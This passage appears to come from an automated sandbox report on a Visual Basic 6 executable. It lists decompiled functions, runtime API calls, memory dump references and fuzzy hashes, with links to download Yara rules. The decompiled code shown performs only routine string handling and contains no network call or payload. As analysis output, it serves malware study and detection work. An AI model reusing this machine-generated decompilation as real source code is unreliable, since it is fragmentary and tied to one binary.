      • __vbaFreeStr.MSVBVM60(00000000,?,0041ECFC,?,?,?,?,00401546), ref: 0041ECF6
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#607#717ChkstkCopyDestructList
      • String ID:
      • API String ID: 1752509113-0
      • Opcode ID: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
      • Instruction ID: b95eba25bacd7ca3d6c7bdb4dd5c54989d587c570b2574e24d603ff420ee1043
      • Opcode Fuzzy Hash: 4b29d472cec14b0db805112cb1a39c9f5321520062d063b12ab11fbdc4f64d80
      • Instruction Fuzzy Hash: 8531DE76900149ABDB00FBD1C986FDEB7B9AF04704F50843AB505B71E1EB786B09CB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041FA09, Relevance: 16.5, APIs: 11, Instructions: 47COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0041FA09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _t24;
				void* _t38;
				void* _t40;
				intOrPtr _t41;

				_t41 = _t40 - 0xc;
				 *[fs:0x0] = _t41;
				L00401540();
				_v16 = _t41;
				_v12 = 0x4013c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401546, _t38);
				L004017B6();
				L004017B6();
				_push( &_v52);
				L00401636();
				_t24 =  &_v52;
				_push(_t24);
				L00401834();
				L0040183A();
				L00401828();
				L00401630();
				_push(0x41fab1);
				L00401846();
				L00401846();
				L00401846();
				return _t24;
			}














      0x0041fa0c
      0x0041fa1b
      0x0041fa25
      0x0041fa2d
      0x0041fa30
      0x0041fa37
      0x0041fa46
      0x0041fa4f
      0x0041fa5a
      0x0041fa62
      0x0041fa63
      0x0041fa68
      0x0041fa6b
      0x0041fa6c
      0x0041fa76
      0x0041fa7e
      0x0041fa83
      0x0041fa88
      0x0041fa9b
      0x0041faa3
      0x0041faab
      0x0041fab0

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FA25
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA4F
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FA5A
      • #612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FA63
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA6C
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA76
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA7E
      • #554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FA83
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FA9B
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAA3
      • __vbaFreeStr.MSVBVM60(0041FAB1,?,?,?,?,?,?,00401546), ref: 0041FAAB
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$CopyMove$#554#612Chkstk
      • String ID:
      • API String ID: 3453574145-0
      • Opcode ID: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
      • Instruction ID: 693852dd8944fc207f73713524658091ffc1878156aa4315fcb4ed92e6621c0d
      • Opcode Fuzzy Hash: eaae57431234c90587fcfc8ebe0cd9364a3d33e9b32d701d7c5814e7891d1866
      • Instruction Fuzzy Hash: D211FA31910149ABCB04FFA2C986EDEB774BF04748F50853AB501771E1EB3CAA06CB98
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420E67, Relevance: 13.6, APIs: 9, Instructions: 53COMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E00420E67(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v52;
				char _v68;
				char* _t29;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L00401540();
				_v16 = _t42;
				_v12 = 0x4014d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
				L004017B6();
				_push(0x5745);
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L004015E2();
				_push( &_v68);
				L00401834();
				L0040183A();
				_push( &_v68);
				_t29 =  &_v52;
				_push(_t29);
				_push(2);
				L00401840();
				_v36 = 0x253;
				_push(0x420f23);
				L00401846();
				L00401846();
				return _t29;
			}















      0x00420e6a
      0x00420e79
      0x00420e83
      0x00420e8b
      0x00420e8e
      0x00420e95
      0x00420ea4
      0x00420ead
      0x00420eb2
      0x00420eba
      0x00420ebb
      0x00420ec3
      0x00420ec7
      0x00420ec8
      0x00420ed0
      0x00420ed1
      0x00420edb
      0x00420ee3
      0x00420ee4
      0x00420ee7
      0x00420ee8
      0x00420eea
      0x00420ef2
      0x00420ef8
      0x00420f15
      0x00420f1d
      0x00420f22

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420E83
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420EAD
      • #698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 00420EBB
      • #520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 00420EC8
      • __vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420ED1
      • __vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EDB
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 00420EEA
      • __vbaFreeStr.MSVBVM60(00420F23), ref: 00420F15
      • __vbaFreeStr.MSVBVM60(00420F23), ref: 00420F1D
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#520#698ChkstkCopyList
      • String ID:
      • API String ID: 415313431-0
      • Opcode ID: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
      • Instruction ID: b47ba6cb6cfe9537fd216ca96262c85262f1db123f7c31d4278a9a27857eaefe
      • Opcode Fuzzy Hash: b628ab3025051dbb522311c7f76f4921803e836e9b817ab5315d98a1f7a474c2
      • Instruction Fuzzy Hash: 6411DD72900218ABCB00FB91DD86EEEB7BCBF44748F54842AF501A71A1EB789605CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F341, Relevance: 13.6, APIs: 9, Instructions: 50COMMON
      Download Yara Rule
      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F35D
      • #707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F385
      • __vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F38F
      • #593.MSVBVM60(0000000A), ref: 0041F3AC
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041F3B7
      • #537.MSVBVM60(0000003B,0000000A), ref: 0041F3BE
      • __vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F3C8
      • __vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E1
      • __vbaFreeStr.MSVBVM60(0041F3EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F3E9
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$Move$#537#593#707Chkstk
      • String ID:
      • API String ID: 2467297632-0
      • Opcode ID: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
      • Instruction ID: ca640c03beec4af6d082099bc43d86ae2034aa72d58194d0da08468fb277227d
      • Opcode Fuzzy Hash: 316b31308a43112fef42106b2f5cd699d70758ed15948049cee89f217091de0c
      • Instruction Fuzzy Hash: 59113071A40209ABDB01FBA1CC86BDE7BB4AF00708F10843AF501BB1E1DB7C9645CB99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041ED1B, Relevance: 12.0, APIs: 8, Instructions: 48COMMON
      Download Yara Rule
      C-Code - Quality: 62%
      			E0041ED1B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				long long _v40;
				char _v48;
				signed char _t22;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L00401540();
				_v16 = _t32;
				_v12 = 0x401358;
				_v8 = 0;
				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
				L004017B6();
				asm("fabs");
				asm("fnstsw ax");
				if((_t22 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L00401666();
				_v40 = __fp0;
				_v48 = 5;
				__eax =  &_v48;
				_push(__eax);
				L0040166C();
				L0040183A();
				L00401828();
				asm("wait");
				_push(0x41edc0);
				L00401846();
				L00401846();
				return __eax;
			}














      0x0041ed1e
      0x0041ed2d
      0x0041ed37
      0x0041ed3f
      0x0041ed42
      0x0041ed49
      0x0041ed58
      0x0041ed61
      0x0041ed6c
      0x0041ed6e
      0x0041ed72
      0x0040154c
      0x0040154c
      0x0041ed74
      0x0041ed79
      0x0041ed7c
      0x0041ed83
      0x0041ed86
      0x0041ed87
      0x0041ed91
      0x0041ed99
      0x0041ed9e
      0x0041ed9f
      0x0041edb2
      0x0041edba
      0x0041edbf

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041ED37
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041ED61
      • __vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041ED74
      • #536.MSVBVM60(00000005), ref: 0041ED87
      • __vbaStrMove.MSVBVM60(00000005), ref: 0041ED91
      • __vbaFreeVar.MSVBVM60(00000005), ref: 0041ED99
      • __vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDB2
      • __vbaFreeStr.MSVBVM60(0041EDC0,00000005), ref: 0041EDBA
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: __vba$Free$#536ChkstkCopyMove
      • String ID:
      • API String ID: 983360083-0
      • Opcode ID: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
      • Instruction ID: bcc319732d83193761566249f4410b334ff801331151ac71e4b9571fc2eee605
      • Opcode Fuzzy Hash: 552b9a0e46c1e401c01f65e268d5356e34434584d4332fbea828098f5c8dbf55
      • Instruction Fuzzy Hash: 6B115E35800209ABCB00FFA6D846BDE7BB4BF45748F10846AF401771E1DB3C9A45CB59
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042129F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
      Download Yara Rule
      C-Code - Quality: 82%
      			E0042129F() {
				signed int _v8;
				signed int _t8;
				char _t10;
				signed int _t13;
				intOrPtr _t15;
				intOrPtr _t17;

				_push(4);
				L00401540();
				_t8 = 1;
				_t13 = 1;
				_t15 =  *0x422034; // 0x705630
				_t17 =  *0x422034; // 0x705630
				_t10 =  *((intOrPtr*)(_t17 + _t8 * 0xffffffff));
				 *((char*)(_t15 + _t13 * 0xffffffff)) = _t10;
				_push( *0x422034);
				L004015D0();
				 *0x422040 = _t10;
				_v8 = _v8 | 0x0000ffff;
				 *0x422044 = _v8;
				return _v8;
			}









      0x004212a2
      0x004212a5
      0x004212ad
      0x004212b3
      0x004212b7
      0x004212bd
      0x004212c3
      0x004212c6
      0x004212c9
      0x004212cf
      0x004212d4
      0x004212d9
      0x004212e2
      0x004212ee

      APIs
      • __vbaChkstk.MSVBVM60(?,0041D72D), ref: 004212A5
      • #644.MSVBVM60(?,?,0041D72D), ref: 004212CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882461765.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.882454514.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.882487277.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.882492225.0000000000424000.00000002.00020000.sdmp Download File
      Similarity
      • API ID: #644Chkstk__vba
      • String ID: 0Vp
      • API String ID: 3537395942-1741600620
      • Opcode ID: fd2af8f999a0c8f39f5a35538a94ba737fded3850314be441f7a0be846c259b9
      • Instruction ID: a8e23d06acab7e75d8665402ef0bb63053a8901cb422af0ba97e5d0c302f9eae
      • Opcode Fuzzy Hash: fd2af8f999a0c8f39f5a35538a94ba737fded3850314be441f7a0be846c259b9
      • Instruction Fuzzy Hash: FEF0E539202741BAC7386B65AF126D6BB78AF49750F50006AFB01AF2F1E7B05A42D75C
      Uniqueness

      Uniqueness Score: -1.00%